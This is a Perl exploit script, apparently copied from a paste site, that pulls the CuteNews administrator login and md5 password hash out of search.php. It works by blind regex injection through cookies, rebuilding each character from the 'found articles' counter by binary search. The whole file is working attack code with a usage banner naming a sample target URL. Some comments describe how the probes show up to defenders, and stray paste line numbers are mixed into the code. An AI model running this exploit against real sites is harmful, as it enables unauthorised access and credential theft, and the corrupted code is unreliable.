31337 sploet

#!/usr/bin/perl
# Recovers the administrator login and md5 password hash from a CuteNews
# search.php endpoint (URL given as the only argument; see &usage).  Nothing is
# read back directly: every request is a yes/no probe whose answer is the
# "found [N] articles" counter returned by &parse_response, and the values are
# rebuilt one character at a time by &binary_search.  Probes are plain GETs to
# the target with the search parameters moved into the Cookie header (see
# &do_REQ), so from the defending side they appear as a burst of requests to
# search.php with an (apparently) empty query string and regex metacharacters
# in the 'title' / 'story' cookies.
&usage unless $ARGV[0];   # no target URL: print the banner and exit(0); this line is outside the scope of the 'use strict' below

use strict;
use LWP;                    # URI is only loaded transitively through LWP here; there is no explicit 'use URI'
use utf8;                   # the Cyrillic literal in &parse_response is UTF-8 in the source text
use Encode qw( decode );    # the server replies in cp1251; &parse_response decodes it

$| = 1;                     # autoflush STDOUT



# main
my $search_page_url = URI->new($ARGV[0]);   # base URL from the command line; every probe clones it
my $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36';    # common user agent string
my ($login, $md5hash);                      # results; $login is also read by &password once it is known
$search_page_url->query_form([  'dosearch' => 'yes',
                                'user' => '1',
                                ]
                            );              # fixed part of the query; &login / &password append their own parameters





# try the 'admin' login
print STDERR "[Getting login]\n";
{
    print STDERR "Checking if there exists account named 'admin'... ";

    # a single probe with a fully anchored pattern: true only if some account is literally 'admin'
    if (&login('^admin$')){
        $login = 'admin';
        print STDERR 'yes!';
    } else {
        print STDERR 'no.';
    }; 
    print STDERR "\n";
}


# bruteforce [a-zA-Z0-9] login if not 'admin'
unless ($login){
    print STDERR 'Finding login... ';

    my $tmp = '';
    # check if login length is in 1-64
    die "\n", 'Can\'t find suitable account.' unless &login('^[a-zA-Z0-9]{1,64}$');

    # each round fixes one more character; the loop ends when the anchored prefix
    # alone matches, i.e. when the recovered prefix is the whole login
    until( &login("\^${tmp}\$")) {
        $tmp .= &binary_search($tmp, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', \&login);
        print STDERR "\rFinding login... $tmp";
    }
    print STDERR "\n";
    $login = $tmp;
}
die '...' unless $login;





# bruteforce md5 hash
print STDERR "\n[Getting password hash]\n";
{
    my $tmp = '';

    # 32 hex digits; &password narrows one position of $login's hash per round
    while( length($tmp) != 32) {
        $tmp .= &binary_search($tmp, 'abcdef0123456789', \&password);
        print STDERR "\r$tmp";
    }
    print STDERR "\n";
    $md5hash = $tmp;
}
die "..." unless $md5hash;



print STDERR "\n[Output]\n";
print "$login:$md5hash\n";   # the only line written to STDOUT (see &usage: redirect it to a file)
exit;
  81.  
  82.  
  83.  
  84.  
  85.  
  86. # can be upgraded to turn strings like abcdef into [a-f]
  87. sub binary_search{
  88.     my ($part, $symbols, $req) = @_;
  89.  
  90.     print STDERR substr($symbols, int(length($symbols)/2), 1);
  91.  
  92.     while (length($symbols) != 1){
  93.         my $tmp = substr($symbols, 0, int(length($symbols)/2));
  94.         if ($req->("^${part}[$tmp]")){
  95.             $symbols = $tmp;
  96.         } else {
  97.             $symbols = substr($symbols, int(length($symbols)/2));
  98.         }
  99.     print STDERR "\b", substr($symbols, int(length($symbols)/2), 1);
  100.     }
  101.     return $symbols;
  102. }
  103.  
  104.  
  105.  
sub password{   # apply regex from $_[0] to $login's md5-hash and parse response
    # Builds one probe URL from the shared base query plus the parameters below.
    # 'story' carries the caller's pattern behind a look-ahead that only succeeds
    # on a 32-character [a-z0-9] subject, so (per the app-source comment quoted
    # below) the pattern can only be satisfied by the stored hash, not by the
    # nickname.  Requires $login to be set already.  Returns the "found [N]"
    # counter from &parse_response; callers use it as a boolean.
    my $url = $search_page_url->clone;
    $url->query_form(   ($url->query_form,
                        'files_arch[]' => 'data/users.db.php',
                        'title' => $login,
                        'story' => "(?=^[a-z0-9]{32}\$)$_[0]",  # (?=..) to match only vs hash, not nickname. check app source code
                                                                #if(@preg_match("/$story/i", *nickname*) or @preg_match("/$story/i", *hash*)
                        )
                    ); 

    my $response = &do_REQ($url);   # scalar context: body only (dies on a failed request)
   
    return &parse_response($response); 
}
  120.  
  121.  
  122.  
sub login{  # apply regex from $_[0] to login and parse response
    # Same probe as &password but the caller's pattern goes into 'title', i.e. it is
    # evaluated against the account name.  Returns the "found [N]" counter from
    # &parse_response; every caller treats it as a boolean "matched / did not match".
    my $url = $search_page_url->clone;
    $url->query_form(   ($url->query_form,
                        'files_arch[]' => 'data/users.db.php',
                        'title' => $_[0],
                        )
                    ); 

    my $response = &do_REQ($url);   # scalar context: body only (dies on a failed request)
   
    return &parse_response($response); 
}
  135.  
  136.  
  137.  
sub usage{  # print the banner and usage text to STDERR and exit; called when no URL argument was given
    print STDERR '      _   _ _______        ______  
 ___| \ | | ____\ \      / / ___|
/ __|  \| |  _|  \ \ /\ / /\___ \
| (__| |\  | |___  \ V  V /  ___) |
\___|_| \_|_____|  \_/\_/  |____/
 ___ ____   __  
/ _ \___ \ / /_  
| | | |__) | \'_ \
| |_| / __/| (_) |
\___/_____|\___/
 
This program exploits vulnerability in CuteNews php script and gives you administrator login and md5-hashed password.
 
Note: you can redirect stdout to file to get credentials in form login:hash. Stderr will be used for status updates.
 
Example of usage:
    perl ', $0, ' http://rdot.org/cnews/search.php >creds.txt';
 
    exit;   # bare exit is exit(0): a missing argument is not signalled through the exit status
}
  159.  
  160.  
  161.  
  162. sub parse_response{
  163.     my $response = decode('cp1251', $_[0]);
  164.  
  165.     die "Can't parse response!" unless $response =~ m{Найдено <b>\[(\d+)\]</b> статей:};
  166.  
  167.     return $1;
  168. }
  169.  
  170.  
  171.  
my $browser;    # lazily created LWP::UserAgent shared by every probe
sub do_REQ {
    # Perform one GET for the probe URL in $_[0].
    # Scalar context: returns the body (dies when the response is not a success).
    # List context: returns (body, status line, is_success).
    unless ($browser){
        $browser = LWP::UserAgent->new(('agent' => $user_agent));   # browser-like UA string from the main block
        $browser->timeout(30);
    }
    # since rg==on always, turn all GET params 2 COOKIE
    # The entire query string is lifted out of the URL and sent as the Cookie
    # header instead, with '&' rewritten to '; ' so each pair reads as a cookie.
    # The server thus sees a bare GET to the script with the search parameters in
    # Cookie: — relevant when looking for these probes in access logs, where the
    # query-string field will look empty.  (rg is presumably register_globals;
    # not verifiable from this file.)
    my $url = URI->new($_[0]);
    my $params = $url->query();    # undef for a URL without a query; the s/// below would then warn
    $params =~ s/&/; /g;

    $url->query_form('');          # clears the query string (the lone odd argument is consumed as the delimiter by URI::query_form — confirm)
    my $resp = $browser->get($url, ('Cookie' => $params));

    die "Failed making request" unless $resp->is_success;   # a non-success response aborts the whole run

    # list-context callers get the full triple ...
    return ($resp->content, $resp->status_line, $resp->is_success)
        if wantarray;

    # ... scalar callers only the body; this guard is unreachable after the die above
    return unless $resp->is_success;
    return $resp->content;
}